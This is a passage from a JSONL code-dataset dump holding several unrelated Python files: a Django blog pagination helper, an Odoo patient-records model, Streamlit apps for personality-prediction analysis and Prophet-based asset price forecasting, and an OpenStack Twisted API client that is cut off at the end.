offset==0:\n\t\t\tmsg=\"{0}: check {1} successfully, got: {2}\"\\\n\t\t\t\t.format(current_url_name,key, value)\n\t\t\tlogger.info(msg)\n\t\telif offset==1:\n\t\t\tmsg=\"{0}: Warning, failed to check {1}, expect: {2}, got: {3}\"\\\n\t\t\t\t.format(current_url_name,key, threshold,value)\n\t\t\tlogger.warning(msg)\n\t\telif offset==2:\n\t\t\tmsg=\"{0}: Error, failed to check {1}, expect: {2}, got: {3}\"\\\n\t\t\t\t.format(current_url_name,key, threshold,value)\n\t\t\tlogger.error(msg)\n\t\telif offset==-1:\n\t\t\tmsg=\"{0}: Warning, failed to check {1}, expect: {2}, got: {3}\"\\\n\t\t\t\t.format(current_url_name,key, threshold,value)\n\t\t\tlogger.warning(msg)\n\t\telif offset==-2:\n\t\t\tmsg=\"{0}: Error, failed to check {1}, expect: {2}, got: {3}\"\\\n\t\t\t\t.format(current_url_name,key, threshold,value)\n\t\t\tlogger.error(msg)\n","repo_name":"trelay/CRTT","sub_path":"CRTT/get_nodes.py","file_name":"get_nodes.py","file_ext":"py","file_size_in_byte":9557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35424135899","text":"from .models import Blog,BlogType\nfrom django.core.paginator import Paginator\nfrom django.contrib.auth.models import User\nfrom django.db.models import Count\nfrom mysite.forms import LoginForm,RegForm\n# shared helper functions\nEach_page_num = 4\n\ndef get_blogs_common_list(request,blogs_all):\n    context = {}\n\n    paginator = Paginator(blogs_all,Each_page_num)# paginator, Each_page_num items per page\n    page_num = request.GET.get('page',1) # GET request ?page=1\n    page_of_blogs = paginator.get_page(page_num)\n\n    currentr_page_num = page_of_blogs.number# get the current page number\n    a = list(range(max(currentr_page_num-2,1),currentr_page_num))\n    b = list(range(currentr_page_num,min(currentr_page_num+2,paginator.num_pages) + 1))\n    page_range = a+b\n\n    # add ellipsis markers for omitted page numbers\n    if page_range[0]-1>=2:\n        page_range.insert(0,'...')\n    if paginator.num_pages - page_range[-1] >=2:\n        page_range.append('...')\n    \n    # first and last page\n    if page_range[0] != 1:\n        page_range.insert(0,1)\n    if page_range[-1] != paginator.num_pages:\n        page_range.append(paginator.num_pages)\n\n    # get the blog count of each blog type\n    # first approach\n    # BlogType.objects.annotate(blog_count=Count('blog'))\n\n    # second approach\n    '''\n    blog_types = BlogType.objects.all()\n    blog_types_list = []\n    for blog_type in blog_types:\n        blog_type.blog_count = Blog.objects.filter(blog_type = blog_type).count()\n        blog_types_list.append(blog_type)\n    '''\n    #context['blog_types'] = blog_types_list\n    # get the blog count for each date archive\n    blog_dates = Blog.objects.dates('created_time','month','DESC')\n    blog_dates_dict = {}\n    for blog_date in blog_dates:\n        blog_count = Blog.objects.filter(created_time__year=blog_date.year,created_time__month=blog_date.month).count()\n        blog_dates_dict[blog_date] = blog_count\n\n    # the second approach would again use annotate; the difference is that it is applied to\n    #db = Blog.objects.filter(created_time__year=blog_date.year,created_time__month=blog_date.month)\n    #db.annotate\n\n\n    context['blog_types'] = BlogType.objects.annotate(blog_count=Count('blog'))\n    context['page_of_blogs'] = page_of_blogs\n    context['page_range'] = page_range\n    context['blog_dates'] = blog_dates_dict\n\n    return context\n\ndef pro_loginform_template(request):\n    login_form = LoginForm()\n    reg_form = RegForm()\n\n    return {'login_form':login_form,'reg_form':reg_form}","repo_name":"hearecho/mysite","sub_path":"blog/common_func.py","file_name":"common_func.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14383553009","text":"from odoo import api, fields, models, _\nfrom 
datetime import datetime\n\nclass ResPartner(models.Model):\n    _inherit = 'res.partner'\n\n    is_patient = fields.Boolean(\n        string='Es Paciente',\n        required=False)\n    medical_insurance_id = fields.Many2one(\n        comodel_name='medical.insurance',\n        string='Seguro',\n        required=False)\n    medical_category_id = fields.Many2one(\n        comodel_name='medical.insurance.category',\n        string='Categoria de seguro',\n        required=False, domain=\"[('medical_insurance_id', '=', medical_insurance_id)]\")\n    medical_insurance_no = fields.Char(\n        string='No. Seguro',\n        required=False)\n    date_expire_medical_insurance = fields.Date(\n        string='Fecha de vencimiento de seguro',\n        required=False)\n    birth_date = fields.Date(\n        string='Nacimiento',\n        required=False)\n    type_blood = fields.Selection(\n        string='Tipo de sangre',\n        selection=[\n            ('a+', 'A+'),\n            ('a-', 'A-'),\n            ('b+', 'B+'),\n            ('b-', 'B-'),\n            ('ab+', 'AB+'),\n            ('ab-', 'AB-'),\n            ('o+', 'O+'),\n            ('o-', 'O-'),\n        ],\n        required=False, )\n    gender = fields.Selection(\n        string='Sexo',\n        selection=[('male', 'Masculino'),\n                   ('female', 'Femenino'), ],\n        required=False, )\n    tipo_contribuyente = fields.Selection(\n        string='Tipo Contribuyente',\n        selection=[('consumo', 'Consumidor Final'),\n                   ('contribuyente', 'Contribuyente'), ],\n        required=False, )\n    exam_ids = fields.One2many(\n        comodel_name='patient.physical.pressure.exam',\n        inverse_name='patient_id',\n        string='Examenes',\n        required=False)\n    pathological_background_ids = fields.One2many(\n        comodel_name='allergy.disability.pathological.background',\n        inverse_name='patient_id',\n        string='Patologia',\n        required=False, domain=\"[('type_diseases', '=', 'diseases')]\")\n    disability_ids = fields.One2many(\n        comodel_name='disability.background',\n        inverse_name='patient_id',\n        string='Discapacidad',\n        required=False, domain=\"[('type_diseases', '=', 'disability')]\")\n    allergy_ids = fields.One2many(\n        comodel_name='allergy.background',\n        inverse_name='patient_id',\n        string='Alergia',\n        required=False, domain=\"[('type_diseases', '=', 'allergy')]\")\n    consultation_ids = fields.One2many(\n        comodel_name='medical.consultation',\n        inverse_name='patient_id',\n        string='Consultas',\n        required=False)\n    consultation_count = fields.Integer(\n        string='Consultation_count',\n        required=False, compute='_compute_consultation_count')\n    prescription_ids = fields.One2many(\n        comodel_name='medical.prescription',\n        inverse_name='patient_id',\n        string='Recetas',\n        required=False)\n    prescription_count = fields.Integer(\n        string='Prescription_count',\n        required=False, compute='_compute_prescription_count')\n    indication_ids = fields.One2many(\n        comodel_name='labs.indications',\n        inverse_name='patient_id',\n        string='Laboratorio',\n        required=False)\n    indication_count = fields.Integer(\n        string='Indication_count',\n        required=False, compute='_compute_indication_count')\n    result_lab_ids = fields.One2many(\n        comodel_name='labs.indications',\n        inverse_name='patient_id',\n        string='Laboratorio',\n        required=False)\n    result_lab_count = fields.Integer(\n        string='Indication_count',\n        required=False, compute='_compute_result_lab_count')\n    tracking_patient_ids = fields.One2many(\n        comodel_name='tracking.patient',\n        inverse_name='patient_id',\n        string='Seguimiento/Citas',\n        required=False)\n    tracking_count = fields.Integer(\n        string='Tracking Count',\n        required=False, compute='_compute_tracking_count')\n\n    @api.depends('tracking_patient_ids')\n    def _compute_tracking_count(self):\n        for rec in self:\n            rec.tracking_count = len(rec.tracking_patient_ids)\n\n    def action_view_tracking_patient(self):\n        '''\n        This function 
returns an action that displays the opportunities from partner.\n '''\n action = self.env['ir.actions.act_window']._for_xml_id('base_salud_plus.tracking_patient_action')\n action['context'] = {'default_patient_id': self.id,\n 'default_name': self.name,\n 'default_user_id': self.env.user.id}\n action['domain'] = [('patient_id', '=', self.id)]\n return action\n\n def action_view_consultation(self):\n action = self.env['ir.actions.act_window']._for_xml_id('base_salud_plus.medical_consultation_action')\n action['domain'] = [('patient_id.id', '=', self.id)]\n action['context'] = {'default_patient_id': self.id}\n return action\n\n def action_view_prescription(self):\n action = self.env['ir.actions.act_window']._for_xml_id('base_salud_plus.prescription_view_action')\n action['domain'] = [('patient_id.id', '=', self.id)]\n return action\n\n def action_view_indication(self):\n action = self.env['ir.actions.act_window']._for_xml_id('base_salud_plus.labs_indications_view_action')\n action['domain'] = [('patient_id.id', '=', self.id)]\n return action\n\n def action_view_result_lab(self):\n action = self.env['ir.actions.act_window']._for_xml_id('base_salud_plus.result_labs_view_action')\n action['domain'] = [('patient_id.id', '=', self.id)]\n return action\n\n @api.depends('consultation_ids')\n def _compute_consultation_count(self):\n for rec in self:\n rec.consultation_count = len(rec.consultation_ids)\n\n @api.depends('result_lab_ids')\n def _compute_result_lab_count(self):\n for rec in self:\n rec.result_lab_count = len(rec.result_lab_ids)\n\n @api.depends('prescription_ids')\n def _compute_prescription_count(self):\n for rec in self:\n rec.prescription_count = len(rec.prescription_ids)\n\n @api.depends('indication_ids')\n def _compute_indication_count(self):\n for rec in self:\n rec.indication_count = len(rec.indication_ids)\n\n def add_exam(self):\n\n wizard = self.env['add.exam.wizard'].create({\n\n 'patient_id': self.id,\n })\n\n return {\n 'name': _('Agregar'),\n 'type': 'ir.actions.act_window',\n 'res_model': 'add.exam.wizard',\n 'view_mode': 'form',\n 'res_id': wizard.id,\n 'target': 'new'\n }\n\nclass AddExamWizard(models.TransientModel):\n _name = 'add.exam.wizard'\n _description = 'Add Exam Wizard'\n\n patient_id = fields.Many2one(\n comodel_name='res.partner',\n string='Paciente',\n required=False)\n medical_consultation_id = fields.Many2one(\n comodel_name='medical.consultation',\n string='Consulta',\n required=False)\n\n height = fields.Float(\n string='Altura',\n required=False)\n weight = fields.Float(\n string='Peso',\n required=False)\n waist = fields.Float(\n string='Cintura',\n required=False)\n systolic_pressure = fields.Float(\n string='Presion S. Sistolica',\n required=False)\n diastolic_pressure = fields.Float(\n string='Presion S. 
Diastolica',\n required=False)\n\n def add_this(self):\n\n if not self.medical_consultation_id:\n self.env['patient.physical.pressure.exam'].create({\n 'height': self.height,\n 'weight': self.weight,\n 'waist': self.waist,\n 'systolic_pressure': self.systolic_pressure,\n 'diastolic_pressure': self.diastolic_pressure,\n 'patient_id': self.patient_id.id\n })\n else:\n self.env['patient.physical.pressure.exam'].create({\n 'height': self.height,\n 'weight': self.weight,\n 'waist': self.waist,\n 'systolic_pressure': self.systolic_pressure,\n 'diastolic_pressure': self.diastolic_pressure,\n 'patient_id': self.patient_id.id,\n 'medical_consultation_id': self.medical_consultation_id.id\n })\n\n\nclass PatientPhysicalPressureExam(models.Model):\n _name = 'patient.physical.pressure.exam'\n _description = 'Patient Physical & Pressure Exam'\n _order = 'date desc'\n\n date = fields.Date(\n string='Fecha',\n required=True, default=datetime.today())\n height = fields.Float(\n string='Altura | pies',\n required=False)\n weight = fields.Float(\n string='Peso | libras',\n required=False)\n waist = fields.Float(\n string='Cintura | pulgadas',\n required=False)\n systolic_pressure = fields.Float(\n string='Presion S. Sistolica | mmHg',\n required=False)\n diastolic_pressure = fields.Float(\n string='Presion S. Diastolica | mmHg',\n required=False)\n responsable_id = fields.Many2one(\n comodel_name='res.users',\n string='Registrado por',\n required=False, default=lambda self: self.env.user, readonly=True)\n patient_id = fields.Many2one(\n comodel_name='res.partner',\n string='Paciente',\n required=False)\n medical_consultation_id = fields.Many2one(\n comodel_name='medical.consultation',\n string='Consulta',\n required=False)\n\nclass PathologicalBackground(models.Model):\n _name = 'allergy.disability.pathological.background'\n _description = 'Pathological Background'\n\n diseases_id = fields.Many2one(\n comodel_name='diseases.diseases',\n string='Enfermedad',\n required=True, domain=\"[('type_diseases', '=', 'diseases')]\")\n type_diseases = fields.Selection(\n string='Type Diseases',\n selection=[('diseases', 'Enfermedad'),\n ('disability', 'Discapacidad'),\n ('allergy', 'Alergia'),\n ],\n required=False, )\n\n origin = fields.Selection(\n string='Origen',\n selection=[('patient', 'Paciente'),\n ('family', 'Familia'), ],\n required=False, )\n date = fields.Date(\n string='Fecha',\n required=True, default=datetime.today())\n state = fields.Selection(\n string='Estado',\n selection=[\n ('detected', 'Detectato'),\n ('healthy', 'Sano'),\n ('in_treatment', 'En tratamiento'),\n ('not_treated', 'No atendido'),\n ],\n required=True, )\n responsable_id = fields.Many2one(\n comodel_name='res.users',\n string='Registrado por',\n required=False, default=lambda self: self.env.user, readonly=True)\n patient_id = fields.Many2one(\n comodel_name='res.partner',\n string='Paciente',\n required=False)\n medical_consultation_id = fields.Many2one(\n comodel_name='medical.consultation',\n string='Consulta',\n required=False)\n\nclass DisabilityBackground(models.Model):\n _name = 'disability.background'\n _description = 'Disability Background'\n\n diseases_id = fields.Many2one(\n comodel_name='diseases.diseases',\n string='Enfermedad',\n required=True, domain=\"[('type_diseases', '=', 'disability')]\")\n type_diseases = fields.Selection(\n string='Type Diseases',\n selection=[('diseases', 'Enfermedad'),\n ('disability', 'Discapacidad'),\n ('allergy', 'Alergia'),\n ],\n required=False, )\n\n origin = fields.Selection(\n 
string='Origen',\n selection=[('patient', 'Paciente'),\n ('family', 'Familia'), ],\n required=False, )\n date = fields.Date(\n string='Fecha',\n required=True, default=datetime.today())\n state = fields.Selection(\n string='Estado',\n selection=[\n ('detected', 'Detectato'),\n ('healthy', 'Sano'),\n ('in_treatment', 'En tratamiento'),\n ('not_treated', 'No atendido'),\n ],\n required=True, )\n responsable_id = fields.Many2one(\n comodel_name='res.users',\n string='Registrado por',\n required=False, default=lambda self: self.env.user, readonly=True)\n patient_id = fields.Many2one(\n comodel_name='res.partner',\n string='Paciente',\n required=False)\n medical_consultation_id = fields.Many2one(\n comodel_name='medical.consultation',\n string='Consulta',\n required=False)\n\nclass AllergyBackground(models.Model):\n _name = 'allergy.background'\n _description = 'Allergy Background'\n\n diseases_id = fields.Many2one(\n comodel_name='diseases.diseases',\n string='Enfermedad',\n required=True, domain=\"[('type_diseases', '=', 'allergy')]\")\n type_diseases = fields.Selection(\n string='Type Diseases',\n selection=[('diseases', 'Enfermedad'),\n ('disability', 'Discapacidad'),\n ('allergy', 'Alergia'),\n ],\n required=False, )\n\n origin = fields.Selection(\n string='Origen',\n selection=[('patient', 'Paciente'),\n ('family', 'Familia'), ],\n required=False, )\n date = fields.Date(\n string='Fecha',\n required=True, default=datetime.today())\n state = fields.Selection(\n string='Estado',\n selection=[\n ('detected', 'Detectato'),\n ('healthy', 'Sano'),\n ('in_treatment', 'En tratamiento'),\n ('not_treated', 'No atendido'),\n ],\n required=True, )\n responsable_id = fields.Many2one(\n comodel_name='res.users',\n string='Registrado por',\n required=False, default=lambda self: self.env.user, readonly=True)\n patient_id = fields.Many2one(\n comodel_name='res.partner',\n string='Paciente',\n required=False)\n medical_consultation_id = fields.Many2one(\n comodel_name='medical.consultation',\n string='Consulta',\n required=False)\n\n\n","repo_name":"WildyEstephan/SaludPlus","sub_path":"base_salud_plus/models/patient.py","file_name":"patient.py","file_ext":"py","file_size_in_byte":14355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29595669793","text":"import pandas as pd\r\nfrom sklearn.cluster import KMeans\r\nimport numpy as np\r\nimport streamlit as st\r\nimport pandas as pd\r\nimport time\r\nimport copy\r\nimport matplotlib.pyplot as plt\r\nimport plotly_express as px\r\nimport seaborn as sns\r\nfrom sklearn import metrics\r\n\r\ndef app():\r\n header = st.beta_container()\r\n dataset = st.beta_container()\r\n datapreprocessing = st.beta_container()\r\n features = st.beta_container()\r\n graphs = st.beta_container()\r\n model_training = st.beta_container()\r\n\r\n @st.cache\r\n def get_data(filename):\r\n data1 = pd.read_csv(filename, sep=',')\r\n\r\n return data1\r\n @st.cache\r\n def feat(data2):\r\n x = data2.describe()\r\n return x\r\n @st.cache\r\n def pre_data(filename1):\r\n\r\n data2 = filename1.copy()\r\n return data2\r\n\r\n @st.cache\r\n def grapy(data4):\r\n df = data4\r\n numeric_cols = list(df.select_dtypes(['float64', 'int64']).columns)\r\n text_data = df.select_dtypes(['object'])\r\n text_cols = text_data.columns\r\n return df, numeric_cols, text_cols\r\n\r\n with header:\r\n st.markdown(\r\n '
Analysis
',\r\n unsafe_allow_html=True)\r\n st.subheader(\"- Let's understand and analyize it.\")\r\n\r\n with dataset:\r\n with st.beta_expander(\"Dataset-\"):\r\n st.header(\"*Online Dataset*\")\r\n dataset = get_data('train.csv')\r\n\r\n if st.button('View Data'):\r\n latest_iteration = st.empty()\r\n for i in range(100):\r\n latest_iteration.info(f' {i + 1} %')\r\n time.sleep(0.05)\r\n time.sleep(0.2)\r\n latest_iteration.empty()\r\n st.info(\"train.csv\")\r\n st.write(dataset.head(709))\r\n x_val = dataset.shape[0]\r\n y_val = dataset.shape[1]\r\n st.write(\"Data-shape :\", x_val, \"Features :\", y_val)\r\n\r\n with datapreprocessing:\r\n with st.beta_expander(\"Pre-Processed Data-\"):\r\n st.header(\"Data after Pre-processing:\")\r\n dd = dataset.copy()\r\n data = copy.deepcopy(pre_data(dd))\r\n st.write(data.head(150))\r\n\r\n st.write('Number of participants: ', len(data))\r\n data.head()\r\n\r\n st.write('Is there any missing value? ', data.isnull().values.any())\r\n st.write('How many missing values? ', data.isnull().values.sum())\r\n data.dropna(inplace=True)\r\n st.write('Number of participants after eliminating missing values: ', len(data))\r\n\r\n # For ease of calculation lets scale all the values between 0-1 and take a sample of 5000\r\n if st.button(\"Final Data\"):\r\n d1 = data.copy()\r\n d1.drop(d1.columns[7], axis=1, inplace=True)\r\n st.write(d1.head(150))\r\n x_valnew = d1.shape[0]\r\n y_valnew = d1.shape[1]\r\n st.write(\"Data-shape :\", x_valnew, \"Features :\", y_valnew)\r\n with features:\r\n with st.beta_expander(\"Features-\"):\r\n st.header(\"*Features Description:*\")\r\n y3 = copy.deepcopy(data)\r\n y3.drop(y3.columns[7], axis=1, inplace=True)\r\n y = copy.deepcopy(feat(y3))\r\n st.write(y)\r\n with graphs:\r\n with st.beta_expander(\"Graphical Visualization-\"):\r\n st.header(\"*Graphical representation:*\")\r\n df, numeric_cols, text_cols = grapy(y3)\r\n\r\n col3, col4 = st.beta_columns((1, 3))\r\n\r\n with col3:\r\n chart_select = st.selectbox(label=\"Select the chart-type\", options=[\r\n 'Scatter-plots', 'Histogram', 'Distplot', 'Box-plot', 'Violin-plot', 'Heat-map'\r\n ])\r\n if chart_select == 'Scatter-plots':\r\n st.subheader(\"Scatter-plot Settings:\" )\r\n x_values = st.selectbox('X-axis', options=numeric_cols)\r\n y_values = st.selectbox('Y-axis', options=numeric_cols)\r\n with col4:\r\n plot = px.scatter(data_frame=df, x=x_values, y=y_values)\r\n st.plotly_chart(plot)\r\n if chart_select == 'Histogram':\r\n st.subheader(\"Histogram Settings:\")\r\n x_values = st.selectbox('value', options=numeric_cols)\r\n x_val = np.array(df[x_values])\r\n fig, ax = plt.subplots(figsize=(15, 9))\r\n sns.set_style(\"dark\")\r\n sns.set_style(\"darkgrid\")\r\n sns.histplot(data=x_val, kde=True)\r\n with col4:\r\n st.pyplot(fig)\r\n if chart_select == 'Distplot':\r\n st.subheader(\"Distplot Settings:\")\r\n x_values = st.selectbox('value', options=numeric_cols)\r\n x_val = np.array(df[x_values])\r\n fig, ax = plt.subplots(figsize=(15, 9))\r\n sns.set_style(\"dark\")\r\n sns.set_style(\"darkgrid\")\r\n sns.distplot(x_val)\r\n with col4:\r\n st.pyplot(fig)\r\n if chart_select == 'Box-plot':\r\n st.subheader(\"Box-plot Settings:\" )\r\n x_values = st.selectbox('X-axis', options=numeric_cols)\r\n y_values = st.selectbox('Y-axis', options=numeric_cols)\r\n with col4:\r\n plot = px.box(data_frame=df, x=x_values, y=y_values)\r\n st.plotly_chart(plot)\r\n if chart_select == 'Violin-plot':\r\n st.subheader(\"Violin-plot Settings:\" )\r\n x_values = st.selectbox('X-axis', 
options=numeric_cols)\r\n y_values = st.selectbox('Y-axis', options=numeric_cols)\r\n with col4:\r\n plot = px.violin(data_frame=df, x=x_values, y=y_values, points='all', box=True)\r\n st.plotly_chart(plot)\r\n if chart_select == 'Heat-map':\r\n st.subheader('Heat-map')\r\n\r\n data_val = y3\r\n fig, ax = plt.subplots(figsize=(25, 10))\r\n sns.set_style(\"darkgrid\")\r\n sns.set_style(\"dark\")\r\n sns.set_theme(style='darkgrid',palette='deep')\r\n sns.heatmap(data_val.corr(), ax=ax, annot=True, annot_kws={\"size\": 9}, fmt='.1f', linewidths=.5,\r\n cbar=True, xticklabels=1, yticklabels=1,\r\n cbar_kws={\"orientation\": \"vertical\"}, cmap='BuPu')\r\n\r\n with col4:\r\n st.pyplot(fig)\r\n with model_training:\r\n #col4, col5 = st.beta_columns((3, 4))\r\n with st.beta_expander(\"Model Training-\"):\r\n st.header(\"*Accuracy of Model:*\")\r\n classifier_name = st.selectbox(\"Select Classifier :\", (\"Logistic Regression\", \"Support Vector Machine\"))\r\n if classifier_name == \"Logistic Regression\":\r\n if st.button(\"Score of Logistic Regression\"):\r\n time.sleep(0.1)\r\n xy = st.balloons()\r\n testdata = pd.read_csv('test.csv')\r\n outputdata = pd.read_csv('output.csv')\r\n output = outputdata.values\r\n outputdata.drop(outputdata.columns[:1], axis=1, inplace=True)\r\n testdata.drop(testdata.columns[:7], axis=1, inplace=True)\r\n st.write('Prediction accuracy of test data : ')\r\n st.write('{:.2%}\\n'.format(metrics.accuracy_score(testdata, outputdata)))\r\n from sklearn.metrics import cohen_kappa_score\r\n cohen_score = cohen_kappa_score(testdata, outputdata)\r\n st.write('Cohen-Score of test data:')\r\n st.write(cohen_score)\r\n time.sleep(1)\r\n xy.empty()\r\n\r\n if classifier_name == \"Support Vector Machine\":\r\n if st.button(\"Score of Support Vector Machine\"):\r\n time.sleep(0.1)\r\n xy = st.balloons()\r\n testdata = pd.read_csv('svm-test.csv')\r\n outputdata = pd.read_csv('svm-output.csv')\r\n output = outputdata.values\r\n outputdata.drop(outputdata.columns[:1], axis=1, inplace=True)\r\n testdata.drop(testdata.columns[:7], axis=1, inplace=True)\r\n st.write('Prediction accuracy of test data : ')\r\n st.write('{:.2%}\\n'.format(metrics.accuracy_score(testdata, outputdata)))\r\n from sklearn.metrics import cohen_kappa_score\r\n cohen_score = cohen_kappa_score(testdata, outputdata)\r\n st.write('Cohen-Score of test data:')\r\n st.write(cohen_score)\r\n time.sleep(1)\r\n xy.empty()\r\n","repo_name":"Manish1986451/personality-prediction","sub_path":"app2.py","file_name":"app2.py","file_ext":"py","file_size_in_byte":9193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42421482121","text":"# Import the required libraries and dependencies\nimport pandas as pd\nimport hvplot.pandas\nimport datetime as dt\nimport holoviews as hv\nfrom prophet import Prophet\nimport yfinance as yf\nimport streamlit as st\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error \nfrom math import sqrt\nfrom statsmodels.tsa.seasonal import seasonal_decompose\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Define the dataframes\nforex_data = {\n 'Forex Pair': ['EUR/USD', 'GBP/USD', 'USD/JPY', 'AUD/USD', 'USD/CHF', 'USD/CAD', 'NZD/USD'],\n 'Yahoo Finance Ticker': ['EURUSD=X', 'GBPUSD=X', 'USDJPY=X', 'AUDUSD=X', 'USDCHF=X', 'USDCAD=X', 'NZDUSD=X']\n}\n\ncrypto_data = {\n 'Cryptocurrency': ['Bitcoin', 'Ethereum', 'Ripple', 'Litecoin'],\n 'Yahoo Finance Ticker': ['BTC-USD', 'ETH-USD', 'XRP-USD', 
'LTC-USD']\n}\n\ncommodity_data = {\n 'Commodity': ['Gold', 'Crude Oil (WTI)', 'Silver', 'Natural Gas'],\n 'Yahoo Finance Ticker': ['GC=F', 'CL=F', 'SI=F', 'NG=F']\n}\n\nindices_data = {\n 'Index': ['S&P 500', 'Dow Jones Industrial Average', 'Nasdaq Composite', 'FTSE 100'],\n 'Yahoo Finance Ticker': ['^GSPC', '^DJI', '^IXIC', '^FTSE']\n}\n\n# Step 1: Set up Streamlit app and user input\n\n# Set page configuration\nst.set_page_config(\n page_title=\"Price Prediction App\",\n page_icon=\"✅\",\n layout=\"wide\",\n)\n\nst.subheader(\"Example inputs\")\n\n# Sidebar section\nst.sidebar.title(\"Settings\")\n\n# Create a select box in the sidebar to choose a dataframe\nselected_dataframe = st.sidebar.selectbox(\"Select a Dataframe\", [\"Forex\", \"Cryptocurrency\", \"Commodities\", \"Indices\"])\n\n# Create a select box for choosing the timeframe interval\nselected_interval = st.sidebar.selectbox(\"Select Timeframe Interval\", [\"1d\", \"1wk\", \"1mo\"])\n\n# Create a select box for choosing the ticker symbol\nsymbol = st.sidebar.text_input('Enter a ticker symbol:', 'BTC-USD')\n\n\n# Display the selected dataframe in the main content area\nif selected_dataframe == \"Forex\":\n st.write(pd.DataFrame(forex_data))\nelif selected_dataframe == \"Cryptocurrency\":\n st.write(pd.DataFrame(crypto_data))\nelif selected_dataframe == \"Commodities\":\n st.write(pd.DataFrame(commodity_data))\nelif selected_dataframe == \"Indices\":\n st.write(pd.DataFrame(indices_data))\n\n\n\n\n# Step 2: Fetch and prepare the data with the selected timeframe interval\ndf = yf.download(symbol, period=\"5y\", interval=selected_interval)\ndf = df[[\"Close\"]]\ndf = df.reset_index()\ndf.columns = [\"ds\", \"y\"]\ndf = df.sort_values(by=[\"ds\"], ascending=True)\n\n# Set the frequency of the DateTimeIndex\ndf[\"ds\"] = pd.to_datetime(df[\"ds\"])\ndf = df.set_index(pd.DatetimeIndex(df[\"ds\"]))\n\n# Step 3: Fit the Prophet model\nmodel = Prophet()\nmodel.fit(df)\n\n# Step 4: Make predictions\nfuture_trends = model.make_future_dataframe(periods=1000, freq=\"H\")\nforecast_trends = model.predict(future_trends)\n\n# Step 5: Visualize the predictions\nst.write(f'Price data for {symbol}')\nst.line_chart(df.set_index('ds')['y'])\n\nst.write(f'Predicted price data for {symbol}')\nfig1 = model.plot(forecast_trends)\nst.pyplot(fig1)\n\nst.write(f'Forecast components for {symbol}')\nfig2 = model.plot_components(forecast_trends)\nst.pyplot(fig2)\n\nforecast_trends = forecast_trends.set_index([\"ds\"])\n\n# Step 6: Additional analysis\n\n# 1. Performance Metrics\ny_true = df['y']\ny_pred = forecast_trends.loc[df['ds'], 'yhat']\n\nmae = mean_absolute_error(y_true, y_pred)\nmse = mean_squared_error(y_true, y_pred)\nrmse = sqrt(mse)\n\nst.write('Mean Absolute Error (MAE):', mae)\nst.write('Mean Squared Error (MSE):', mse)\nst.write('Root Mean Squared Error (RMSE):', rmse)\n\n# 2. Volatility Analysis\ndf['returns'] = df['y'].pct_change()\ndf['volatility'] = df['returns'].rolling(window=20).std()\n\nst.write('Volatility of {}'.format(symbol))\nst.line_chart(df['volatility'])\n\n# 3. Moving Averages\ndf['sma_50'] = df['y'].rolling(window=50).mean()\ndf['sma_200'] = df['y'].rolling(window=200).mean()\n\nst.write('Moving Averages for {}'.format(symbol))\nst.line_chart(df[['y', 'sma_50', 'sma_200']])\n\n# 4. 
Seasonal Decomposition\nresult = seasonal_decompose(df['y'], model='multiplicative', period=365)\nfig, (ax1, ax2, ax3, ax4) = plt.subplots(4, 1, figsize=(15, 10))\n\nresult.observed.plot(ax=ax1)\nax1.set_ylabel('Observed')\nresult.trend.plot(ax=ax2)\nax2.set_ylabel('Trend')\nresult.seasonal.plot(ax=ax3)\nax3.set_ylabel('Seasonal')\nresult.resid.plot(ax=ax4)\nax4.set_ylabel('Residual')\n\nst.write(f'Seasonal Decomposition for {symbol}')\nst.pyplot(fig)","repo_name":"RichieGarafola/AssetPricePrediction","sub_path":"forecaster.py","file_name":"forecaster.py","file_ext":"py","file_size_in_byte":4423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1749252543","text":"import logging\nlog = logging.getLogger('zen.OpenStack.txapiclient')\n\nfrom .session import SessionManager\nfrom .exceptions import APIClientError\n\nfrom twisted.internet.defer import inlineCallbacks, returnValue\n\nimport json\n\n\nclass BaseClient(object):\n session_manager = None\n keystone_service_type = None # override in subclasses\n\n def __init__(self, username=None, password=None, auth_url=None, project_id=None, region_name=None, session_manager=None):\n if session_manager:\n self.session_manager = session_manager\n else:\n self.session_manager = SessionManager(username, password, auth_url, project_id, region_name)\n\n @inlineCallbacks\n def get_url(self, interface=\"public\"):\n base_url = yield self.session_manager.get_service_url(self.keystone_service_type, interface)\n returnValue(base_url)\n\n @inlineCallbacks\n def get_json(self, url_path, interface=\"public\", **kwargs):\n base_url = yield self.session_manager.get_service_url(self.keystone_service_type, interface)\n full_url = base_url + url_path\n\n body, headers = yield self.session_manager.authenticated_GET_request(full_url, params=kwargs)\n # will raise an exception if there was an error, so we can assume\n # that the result is normal json.\n\n try:\n data = json.loads(body)\n except ValueError:\n raise APIClientError(\"Unable to parse JSON response from %s: %s\" % (full_url, body))\n\n returnValue(data)\n\n @inlineCallbacks\n def get_json_collection(self, url_path, interface=\"public\", **kwargs):\n \"\"\"\n Collections are represented as one or more pages, linked by next/previous\n urls. 
We just spin through all the nexts, building up the result, and\n then return the whole thing.\n \"\"\"\n\n base_url = yield self.session_manager.get_service_url(self.keystone_service_type, interface)\n full_url = base_url + url_path\n\n result = {}\n while True:\n body, headers = yield self.session_manager.authenticated_GET_request(full_url, params=kwargs)\n # will raise an exception if there was an error, so we can assume\n # that the result is normal json.\n\n try:\n data = json.loads(body)\n except ValueError:\n raise APIClientError(\"Unable to parse JSON response from %s: %s\" % (full_url, body))\n\n for key in data.keys():\n if key != 'links':\n if key not in 'result':\n result[key] = []\n result[key].extend(data[key])\n\n full_url = data['links']['next']\n if full_url is None:\n break\n\n returnValue(result)\n\n\ndef api(url_path):\n\n @inlineCallbacks\n def api_caller(self, **kwargs):\n result = yield self.get_json(url_path, **kwargs)\n returnValue(result)\n\n return api_caller\n\n\ndef api_collection(url_path, **kwargs):\n\n @inlineCallbacks\n def api_caller(self):\n result = yield self.get_json_collection(url_path, **kwargs)\n returnValue(result)\n\n return 